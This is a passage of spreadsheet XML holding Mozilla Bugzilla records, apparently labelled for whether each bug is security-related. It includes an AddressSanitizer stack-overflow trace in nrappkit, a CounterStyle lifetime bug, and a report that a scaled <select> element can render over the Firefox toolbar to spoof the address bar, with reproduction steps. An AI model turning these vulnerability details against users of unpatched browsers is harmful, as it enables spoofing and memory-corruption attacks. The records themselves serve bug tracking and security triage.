      <c r="U1796" t="n">
        <v>0</v>
      </c>
      <c r="V1796" t="n">
        <v>25</v>
      </c>
      <c r="W1796" t="inlineStr">
        <is>
          <t>This crash was found while dom fuzzing, however the testcase does not reproduce. It looks like the nr_reg_assoc_destroy method is used incorrectly here:
https://searchfox.org/mozilla-central/source/media/mtransport/third_party/nrappkit/src/registry/registrycb.c#185
=================================================================
==1654==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fed29ec5e10 at pc 0x7fed4011894e bp 0x7fed29ec5d50 sp 0x7fed29ec5d48
READ of size 8 at 0x7fed29ec5e10 thread T5 (IPDL Background)
    #0 0x7fed4011894d in r_assoc_destroy /builds/worker/workspace/build/src/media/mtransport/third_party/nrappkit/src/util/libekr/r_assoc.c
    #1 0x7fed40117d36 in nr_reg_assoc_destroy /builds/worker/workspace/build/src/media/mtransport/third_party/nrappkit/src/registry/registrycb.c:271:10
    #2 0x7fed40117d36 in nr_reg_register_callback /builds/worker/workspace/build/src/media/mtransport/third_party/nrappkit/src/registry/registrycb.c:185
    #3 0x7fed4011a477 in NR_reg_register_callback /builds/worker/workspace/build/src/media/mtransport/third_party/nrappkit/src/registry/registrycb.c:404:20
    #4 0x7fed4011a477 in r_log_get_destinations /builds/worker/workspace/build/src/media/mtransport/third_party/nrappkit/src/log/r_log.c:571
    #5 0x7fed40113826 in _r_log_init /builds/worker/workspace/build/src/media/mtransport/third_party/nrappkit/src/log/r_log.c:646:9
    #6 0x7fed40113826 in r_log_init /builds/worker/workspace/build/src/media/mtransport/third_party/nrappkit/src/log/r_log.c:622
    #7 0x7fed4011501d in NR_reg_init /builds/worker/workspace/build/src/media/mtransport/third_party/nrappkit/src/registry/registry.c:105:6
    #8 0x7fed3566c25a in mozilla::RLogConnector::CreateInstance() /builds/worker/workspace/build/src/media/mtransport/rlogconnector.cpp:106:5
    #9 0x7fed35340465 in mozilla::MediaTransportHandlerSTS::EnterPrivateMode() /builds/worker/workspace/build/src/media/webrtc/signaling/src/peerconnection/MediaTransportHandler.cpp:1090:3
    #10 0x7fed3535c55a in mozilla::MediaTransportParent::RecvEnterPrivateMode() /builds/worker/workspace/build/src/media/webrtc/signaling/src/peerconnection/MediaTransportParent.cpp:118:20
    #11 0x7fed346a2c45 in mozilla::dom::PMediaTransportParent::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PMediaTransportParent.cpp:435:64
    #12 0x7fed34d29ca0 in mozilla::ipc::PBackgroundParent::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundParent.cpp:3588:32
    #13 0x7fed33ec0a86 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2184:25
    #14 0x7fed33ebb7eb in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2108:9
    #15 0x7fed33ebdda7 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1955:3
    #16 0x7fed33ebec37 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1986:13
    #17 0x7fed32cd7800 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
    #18 0x7fed32cdd628 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #19 0x7fed33ecb842 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:303:20
    #20 0x7fed33dc5632 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #21 0x7fed33dc5632 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #22 0x7fed33dc5632 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #23 0x7fed32cd114a in nsThread::ThreadFunc(void*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:458:11
    #24 0x7fed55d870bd in _pt_root /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:198:5
    #25 0x7fed559cb6da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
    #26 0x7fed549a988e in clone (/lib/x86_64-linux-gnu/libc.so.6+0x12188e)
Address 0x7fed29ec5e10 is located in stack of thread T5 (IPDL Background) at offset 80 in frame
    #0 0x7fed40117acf in nr_reg_register_callback /builds/worker/workspace/build/src/media/mtransport/third_party/nrappkit/src/registry/registrycb.c:119
  This frame has 3 object(s):
    [32, 40) 'ptr.addr.i' (line 271)
    [64, 72) 'assoc' (line 121) &lt;== Memory access at offset 80 overflows this variable
    [96, 105) 'cb_id' (line 125) &lt;== Memory access at offset 80 underflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
      (longjmp and C++ exceptions *are* supported)
Thread T5 (IPDL Background) created by T0 (Socket Process) here:
    #0 0x55a35f8d829d in __interceptor_pthread_create /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:210:3
    #1 0x7fed55d791b8 in _PR_CreateThread /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:430:14
    #2 0x7fed55d62d9e in PR_CreateThread /builds/worker/workspace/build/src/nsprpub/pr/src/pthreads/ptthread.c:503:12
    #3 0x7fed32cd3639 in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:672:8
    #4 0x7fed32cdc770 in nsThreadManager::NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, unsigned int, nsIThread**) /builds/worker/workspace/build/src/xpcom/threads/nsThreadManager.cpp:415:12
    #5 0x7fed32ce028a in NS_NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThread**, nsIRunnable*, unsigned int) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:139:57
    #6 0x7fed33e70282 in NS_NewNamedThread&lt;16&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:71:10
    #7 0x7fed33e70282 in (anonymous namespace)::ParentImpl::CreateBackgroundThread() /builds/worker/workspace/build/src/ipc/glue/BackgroundImpl.cpp:944
    #8 0x7fed33e27fe4 in Alloc /builds/worker/workspace/build/src/ipc/glue/BackgroundImpl.cpp:818:30
    #9 0x7fed33e27fe4 in mozilla::ipc::BackgroundParent::Alloc(mozilla::dom::ContentParent*, mozilla::ipc::Endpoint&lt;mozilla::ipc::PBackgroundParent&gt;&amp;&amp;) /builds/worker/workspace/build/src/ipc/glue/BackgroundImpl.cpp:640
    #10 0x7fed33bf7d87 in mozilla::net::SocketProcessBridgeParent::RecvInitBackground(mozilla::ipc::Endpoint&lt;mozilla::ipc::PBackgroundParent&gt;&amp;&amp;) /builds/worker/workspace/build/src/netwerk/ipc/SocketProcessBridgeParent.cpp:41:8
    #11 0x7fed349eb43d in mozilla::net::PSocketProcessBridgeParent::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PSocketProcessBridgeParent.cpp:130:69
    #12 0x7fed33ec0a86 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2184:25
    #13 0x7fed33ebb7eb in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2108:9
    #14 0x7fed33ebdda7 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1955:3
    #15 0x7fed33ebec37 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1986:13
    #16 0x7fed32cd7800 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
    #17 0x7fed32cdd628 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #18 0x7fed33ec9e64 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:110:5
    #19 0x7fed33dc5632 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #20 0x7fed33dc5632 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #21 0x7fed33dc5632 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #22 0x7fed3c0a9149 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #23 0x7fed3ff96acf in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:934:20
    #24 0x7fed33dc5632 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #25 0x7fed33dc5632 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #26 0x7fed33dc5632 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #27 0x7fed3ff96376 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:769:34
    #28 0x55a35f922d73 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #29 0x55a35f922d73 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:267
    #30 0x7fed548a9b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
SUMMARY: AddressSanitizer: stack-buffer-overflow /builds/worker/workspace/build/src/media/mtransport/third_party/nrappkit/src/util/libekr/r_assoc.c in r_assoc_destroy
Shadow bytes around the buggy address:
  0x0ffe253d0b70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffe253d0b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffe253d0b90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffe253d0ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffe253d0bb0: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2
=&gt;0x0ffe253d0bc0: 00 f2[f2]f2 00 01 f3 f3 00 00 00 00 00 00 00 00
  0x0ffe253d0bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffe253d0be0: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffe253d0bf0: 00 00 00 00 f2 f2 f2 f2 04 f2 01 f3 00 00 00 00
  0x0ffe253d0c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ffe253d0c10: f1 f1 f1 f1 04 f3 f3 f3 00 00 00 00 00 00 00 00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1654==ABORTING</t>
        </is>
      </c>
      <c r="X1796" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1797">
      <c r="A1797" t="n">
        <v>1460447</v>
      </c>
      <c r="B1797" t="inlineStr">
        <is>
          <t>2018-05-09 15:22:04 -0700</t>
        </is>
      </c>
      <c r="C1797" t="inlineStr">
        <is>
          <t>replace tree_get with glom in signature generation code</t>
        </is>
      </c>
      <c r="D1797" t="inlineStr">
        <is>
          <t>2018-06-28 12:10:17 -0700</t>
        </is>
      </c>
      <c r="E1797" t="n">
        <v>1</v>
      </c>
      <c r="F1797" t="n">
        <v>1</v>
      </c>
      <c r="G1797" t="n">
        <v>4</v>
      </c>
      <c r="H1797" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1797" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J1797" t="inlineStr">
        <is>
          <t>Processor</t>
        </is>
      </c>
      <c r="K1797" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1797" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1797" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1797" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1797" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1797" t="inlineStr">
        <is>
          <t>[good first bug]</t>
        </is>
      </c>
      <c r="Q1797" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1797" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1797" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1797" t="n">
        <v>1</v>
      </c>
      <c r="U1797" t="n">
        <v>0</v>
      </c>
      <c r="V1797" t="n">
        <v>9</v>
      </c>
      <c r="W1797" t="inlineStr">
        <is>
          <t>In bug #1383113, I ended up writing the beginnings of a tree manipulation library in socorro.lib.treelib. It had a tree_get function which let you access a specific thing in a deeply nested Python data structure where the branches may not exist.
I think glom (https://glom.readthedocs.io/en/latest/) is more flexible and a good replacement for that nascent tree manipulation library. Replacing our tree_get() calls with glom() calls will let us dump some code we are maintaining and also let us do some other things we can't currently do.
This bug covers adding glom as a dependency, removing socorro/lib/treelib.py and its tests in socorro/unittest/lib/test_treelib.py, and replacing uses of tree_get with glom.</t>
        </is>
      </c>
      <c r="X1797" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1798">
      <c r="A1798" t="n">
        <v>1077687</v>
      </c>
      <c r="B1798" t="inlineStr">
        <is>
          <t>2014-10-03 14:18:25 -0700</t>
        </is>
      </c>
      <c r="C1798" t="inlineStr">
        <is>
          <t>Style struct may refer to removed CounterStyle object</t>
        </is>
      </c>
      <c r="D1798" t="inlineStr">
        <is>
          <t>2016-06-04 16:07:41 -0700</t>
        </is>
      </c>
      <c r="E1798" t="n">
        <v>1</v>
      </c>
      <c r="F1798" t="n">
        <v>1</v>
      </c>
      <c r="G1798" t="n">
        <v>3</v>
      </c>
      <c r="H1798" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1798" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1798" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K1798" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1798" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1798" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1798" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1798" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1798" t="inlineStr">
        <is>
          <t>[adv-main34+] bug 1077718 protects with frame poisoning, backported to Fx34</t>
        </is>
      </c>
      <c r="Q1798" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1798" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1798" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T1798" t="n">
        <v>1</v>
      </c>
      <c r="U1798" t="n">
        <v>0</v>
      </c>
      <c r="V1798" t="n">
        <v>27</v>
      </c>
      <c r="W1798" t="inlineStr">
        <is>
          <t>Per bug 1075336 comment 11, there is some other bug other than the lifetime management problem of CounterStyle, which causes bug 1075336.
In normal case, when any change of styles affect any CounterStyle object, style structs should be reconstructed so that all style structs will use the latest information of counter styles. Hence, when that happens, no style struct should refer to removed CounterStyle objects anymore.
However, bug 1075336 uncovers that there is cases that after a CounterStyle object is remove by the CounterStyleManager, someone could still be using it.</t>
        </is>
      </c>
      <c r="X1798" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1799">
      <c r="A1799" t="n">
        <v>995607</v>
      </c>
      <c r="B1799" t="inlineStr">
        <is>
          <t>2014-04-12 07:00:42 -0700</t>
        </is>
      </c>
      <c r="C1799" t="inlineStr">
        <is>
          <t>AutoDebugModeInvalidation can discard baseline scripts that are on the stack</t>
        </is>
      </c>
      <c r="D1799" t="inlineStr">
        <is>
          <t>2015-08-30 12:01:00 -0700</t>
        </is>
      </c>
      <c r="E1799" t="n">
        <v>1</v>
      </c>
      <c r="F1799" t="n">
        <v>1</v>
      </c>
      <c r="G1799" t="n">
        <v>3</v>
      </c>
      <c r="H1799" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1799" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1799" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K1799" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1799" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1799" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1799" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1799" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1799" t="inlineStr">
        <is>
          <t>[adv-main29+][qa-]</t>
        </is>
      </c>
      <c r="Q1799" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1799" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1799" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T1799" t="n">
        <v>1</v>
      </c>
      <c r="U1799" t="n">
        <v>0</v>
      </c>
      <c r="V1799" t="n">
        <v>19</v>
      </c>
      <c r="W1799" t="inlineStr">
        <is>
          <t>We've seen a number of weird JIT crashes related to the debugger. Bug 982675 is one that affects b2g debugging.
I just pushed a patch to try that much more eagerly JIT-compiles scripts, and we're lucky: bc1 is now crashing reliably:
https://tbpl.mozilla.org/?tree=Try&amp;rev=d7897a97a4cc
It looks like Debugger::addAllGlobalsAsDebuggees has an AutoDebugModeInvalidation for some Zone. Then in ~AutoDebugModeInvalidation, invalidateStack is |false| (because we're turning on the debugger), and we discard baseline scripts that are on the stack.
Although the debugger can't be enabled for compartments with scripts on the stack, the Zone can have compartments that are ignored by the debugger: the debugger's compartment itself or compartments that are invisibleToDebugger(). We don't want to throw away their active scripts.</t>
        </is>
      </c>
      <c r="X1799" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1800">
      <c r="A1800" t="n">
        <v>992425</v>
      </c>
      <c r="B1800" t="inlineStr">
        <is>
          <t>2014-04-04 15:51:52 -0700</t>
        </is>
      </c>
      <c r="C1800" t="inlineStr">
        <is>
          <t>Switch Sync 1.5 to gevent worker that supports timeout</t>
        </is>
      </c>
      <c r="D1800" t="inlineStr">
        <is>
          <t>2014-04-14 17:10:20 -0700</t>
        </is>
      </c>
      <c r="E1800" t="n">
        <v>1</v>
      </c>
      <c r="F1800" t="n">
        <v>1</v>
      </c>
      <c r="G1800" t="n">
        <v>2</v>
      </c>
      <c r="H1800" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1800" t="inlineStr">
        <is>
          <t>Cloud Services</t>
        </is>
      </c>
      <c r="J1800" t="inlineStr">
        <is>
          <t>Operations: Deployment Requests - DEPRECATED</t>
        </is>
      </c>
      <c r="K1800" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1800" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1800" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1800" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1800" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1800" t="inlineStr">
        <is>
          <t>[qa+]</t>
        </is>
      </c>
      <c r="Q1800" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1800" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1800" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1800" t="n">
        <v>1</v>
      </c>
      <c r="U1800" t="n">
        <v>0</v>
      </c>
      <c r="V1800" t="n">
        <v>10</v>
      </c>
      <c r="W1800" t="inlineStr">
        <is>
          <t>Switch the Sync 1.5 server start up script from a worker of type gevent to one of mozsvc.gunicorn_worker.MozSvcGeventWorker, and enable both the worker and request timeout features.  The request timeout feature is activated with the -t flag, and is specified in seconds.  It should match or slightly exceed the default Sync client timeout.  The worker timeout feature is enabled by setting the GEVENT_MAX_BLOCKING_TIME environment variable, and is specified in seconds.  It should be set to a time sufficient to detect a malfunctioning worker, but not so short as to needlessly recycle workers while under load.
This should be tested in the staging environment, and then promoted to production.</t>
        </is>
      </c>
      <c r="X1800" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1801">
      <c r="A1801" t="n">
        <v>977502</v>
      </c>
      <c r="B1801" t="inlineStr">
        <is>
          <t>2014-02-27 00:32:24 -0800</t>
        </is>
      </c>
      <c r="C1801" t="inlineStr">
        <is>
          <t>Sync will never retry if initial authentication fails.</t>
        </is>
      </c>
      <c r="D1801" t="inlineStr">
        <is>
          <t>2014-04-14 07:38:20 -0700</t>
        </is>
      </c>
      <c r="E1801" t="n">
        <v>1</v>
      </c>
      <c r="F1801" t="n">
        <v>1</v>
      </c>
      <c r="G1801" t="n">
        <v>2</v>
      </c>
      <c r="H1801" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1801" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1801" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K1801" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1801" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1801" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1801" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1801" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1801" t="inlineStr"/>
      <c r="Q1801" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1801" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1801" t="inlineStr">
        <is>
          <t>Firefox 30</t>
        </is>
      </c>
      <c r="T1801" t="n">
        <v>1</v>
      </c>
      <c r="U1801" t="n">
        <v>0</v>
      </c>
      <c r="V1801" t="n">
        <v>26</v>
      </c>
      <c r="W1801" t="inlineStr">
        <is>
          <t>If FxA fails to authenticate, things don't work quite as expected.  Specifically, Sync goes into a CLIENT_NOT_CONFIGURED state which prevents Sync from ever automatically retrying.  
Note too that even if sync *did* retry, there is no mechanism by which browserid_identity can be asked to restart the auth dance again.
This is needed to fix bug 969528 - currently *every* problem causes Sync Prefs to enter a "must re-login" state, and every other part of the UI to enter a "please setup sync" state.</t>
        </is>
      </c>
      <c r="X1801" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1802">
      <c r="A1802" t="n">
        <v>42726</v>
      </c>
      <c r="B1802" t="inlineStr">
        <is>
          <t>2000-06-15 14:23:49 -0700</t>
        </is>
      </c>
      <c r="C1802" t="inlineStr">
        <is>
          <t>Crashes when you make a search by clicking on the search button</t>
        </is>
      </c>
      <c r="D1802" t="inlineStr">
        <is>
          <t>2008-07-31 02:54:07 -0700</t>
        </is>
      </c>
      <c r="E1802" t="n">
        <v>1</v>
      </c>
      <c r="F1802" t="n">
        <v>1</v>
      </c>
      <c r="G1802" t="n">
        <v>3</v>
      </c>
      <c r="H1802" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1802" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1802" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K1802" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1802" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1802" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N1802" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1802" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1802" t="inlineStr"/>
      <c r="Q1802" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1802" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1802" t="inlineStr">
        <is>
          <t>M16</t>
        </is>
      </c>
      <c r="T1802" t="n">
        <v>1</v>
      </c>
      <c r="U1802" t="n">
        <v>0</v>
      </c>
      <c r="V1802" t="n">
        <v>19</v>
      </c>
      <c r="W1802" t="inlineStr">
        <is>
          <t>Crashes when you make a search by clicking on the search button using build 
comm. 2000-06-15-08-M17</t>
        </is>
      </c>
      <c r="X1802" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1803">
      <c r="A1803" t="n">
        <v>1700235</v>
      </c>
      <c r="B1803" t="inlineStr">
        <is>
          <t>2021-03-22 16:06:45 -0700</t>
        </is>
      </c>
      <c r="C1803" t="inlineStr">
        <is>
          <t>&lt;select&gt; element with large size then transformed with scale() allow WebRender to render over Firefox UI</t>
        </is>
      </c>
      <c r="D1803" t="inlineStr">
        <is>
          <t>2024-05-30 10:29:20 -0700</t>
        </is>
      </c>
      <c r="E1803" t="n">
        <v>1</v>
      </c>
      <c r="F1803" t="n">
        <v>1</v>
      </c>
      <c r="G1803" t="n">
        <v>3</v>
      </c>
      <c r="H1803" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1803" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1803" t="inlineStr">
        <is>
          <t>Graphics: WebRender</t>
        </is>
      </c>
      <c r="K1803" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1803" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1803" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1803" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1803" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1803" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [adv-main89+]</t>
        </is>
      </c>
      <c r="Q1803" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1803" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1803" t="inlineStr">
        <is>
          <t>90 Branch</t>
        </is>
      </c>
      <c r="T1803" t="n">
        <v>1</v>
      </c>
      <c r="U1803" t="n">
        <v>0</v>
      </c>
      <c r="V1803" t="n">
        <v>30</v>
      </c>
      <c r="W1803" t="inlineStr">
        <is>
          <t>Created attachment 9210903
drawbar.bundle.html
When create `&lt;select&gt;` element with large size attribute and large font-size, then transform the element with CSS `scale()`, the element is rendered and stretched over Firefox toolbar and other UI.
mozregression show the regression range is started from commit [Bug 1664719 - Pt 2a - Re-enable is_ancestor check](https://hg.mozilla.org/integration/autoland/rev/c8102686489e51edec8a976f013398412577be44):
```
19:51.48 INFO: Narrowed integration regression window from [b88d1d84, c8102686] (3 builds) to [25a50264, c8102686] (2 builds) (~1 steps left)
19:51.48 INFO: No more integration revisions, bisection finished.
19:51.48 INFO: Last good revision: 25a50264ae3204f2df9add308fc712df45947637
19:51.48 INFO: First bad revision: c8102686489e51edec8a976f013398412577be44
19:51.48 INFO: Pushlog:
https://hg.mozilla.org/integration/autoland/pushloghtml?fromchange=25a50264ae3204f2df9add308fc712df45947637&amp;tochange=c8102686489e51edec8a976f013398412577be44
```
As it able to render over Firefox address bar and toolbar UI, I can assume it's possible to spoof the address bar with background-image or hide the address bar with background-color.
## Reproduced on:
- Firefox Nightly 88.0a1 (2021-03-22) (64-bit) on Arch Linux (AMD RENOIR (DRM 3.40.0, 5.11.6-arch1-1, LLVM 11.1.0)
- Firefox Nightly 88.0a1 (2021-03-22) (64-bit) on Windows 10 (AMD A8-7410 R5 Graphics)
- Firefox Nightly 88.0a1 (2021-03-22) (64-bit) on Windows 10 (Intel i5-1035G1)
## Steps to Reproduce:
1. Open Firefox with WebRender enabled
2. Visit attached drawbar.bundle.html or hidebar.bundle.html
3. The toolbar is now covered by background-image or background-color
(If toolbar is only partially covered on your screen, try to zoom-in or zoom-out the page, or increase the CSS scale() or &lt;select&gt; size)</t>
        </is>
      </c>
      <c r="X1803" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1804">
      <c r="A1804" t="n">
        <v>827596</v>
      </c>
      <c r="B1804" t="inlineStr">
        <is>
          <t>2013-01-07 16:24:29 -0800</t>
        </is>
      </c>
      <c r="C1804" t="inlineStr">
